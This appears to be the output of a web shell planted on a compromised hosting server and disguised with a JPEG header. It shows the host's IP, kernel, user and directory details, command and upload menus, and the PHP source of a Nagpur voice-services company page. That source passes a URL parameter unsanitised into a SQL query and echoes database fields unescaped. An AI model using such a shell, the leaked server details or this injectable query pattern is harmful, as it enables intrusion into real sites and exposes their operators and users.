����JFIF��x�x������Exif��MM�*���� ����E���J����������������(������������������
Server IP : 103.191.208.227 / Your IP : 3.22.27.41 Web Server : LiteSpeed System : Linux emphasis.herosite.pro 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64 User : mhmsfzcs ( 1485) PHP Version : 8.1.31 Disable Function : show_source, system, shell_exec, passthru, exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home/mhmsfzcs/vflyorions.com/assets/../ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<meta charset="UTF-8"> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta name="description" content="Discover the voice services in Nagpur with our premier solutions! As your trusted voice service provider, we offer unparalleled quality and communication needs. " /> <meta name="keywords" content="voice service company in nagpur, voice services in nagpur, voice service provider, voice services companies in nagpur,outsource voice services " /> <!-- ======== Page title ============ --> <title>Vflyorions | Enhance Efficiency: Voice Service Provider Solutions </title> <?php $pages = 'services'; $page = 'voiceprocess'; include 'header.php'; if(isset($_GET['id'])) { $id=$_GET['id']; } ?> <style> .service-details-wrapper .service-details-content-wrapper h1, .service-details-wrapper .service-details-content-wrapper h2, .service-details-wrapper .service-details-content-wrapper h3, .service-details-wrapper .service-details-content-wrapper h4, .service-details-wrapper .service-details-content-wrapper h5, .service-details-wrapper .service-details-content-wrapper h6, .service-details-wrapper .service-details-content-wrapper p { padding-bottom: 4px; } </style> <div class="page-banner-wrap bg-cover" style="background-image: url('assets/img/page-banner.jpg')"> <div class="container"> <div class="row"> <div class="col-12 col-lg-12"> <div class="page-heading text-white"> <h1>Voice Process Details</h1> </div> <div class="breadcrumb-wrap"> <nav> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="index.html">Home</a></li> <li class="breadcrumb-item"><a href="services.html">Services</a></li> <li class="breadcrumb-item active" aria-current="page"> Voice Process Details</li> </ol> </nav> </div> </div> </div> </div> </div> <section class="service-details-wrapper section-padding"> <div class="container"> <div class="row"> <div class="col-lg-1"></div> <?php $ins="SELECT * FROM `voice_process` WHERE voice_id='$id'"; $res=$conn->query($ins); while($row=$res->fetch_assoc()) { ?> <div class="col-lg-10 col-md-8 ps-lg-5 col-12 order-1 order-md-2"> <div class="service-details-content-wrapper pl-0 pl-md-4"> <div> <div> <img src="admin/assets/product_image/<?php echo $row['image'];?>" alt="" style="width: 100%;height: 400px;"> </div> </div> <h2><?php echo $row['heading'];?></h2> <p><?php echo $row['desc'];?></p> </div> <div class="col-lg-1"></div> </div> <?php } ?> </div> </div> </section> <div class="brand-carousel-wrapper section-padding pt-0"> <div class="container"> <div class="row"> <div class="col-xl-12 col-12"> <div class="brand-carousel-active owl-carousel"> <div class="single-brand-logo"> <img src="assets/img/brand-logo/b1.png" alt=""> </div> <div class="single-brand-logo"> <img src="assets/img/brand-logo/b2.png" alt=""> </div> <div class="single-brand-logo"> <img src="assets/img/brand-logo/b3.png" alt=""> </div> <div class="single-brand-logo"> <img src="assets/img/brand-logo/b4.png" alt=""> </div> <div class="single-brand-logo"> <img src="assets/img/brand-logo/b5.png" alt=""> </div> </div> </div> </div> </div> </div> <?php include 'footer.php'; ?>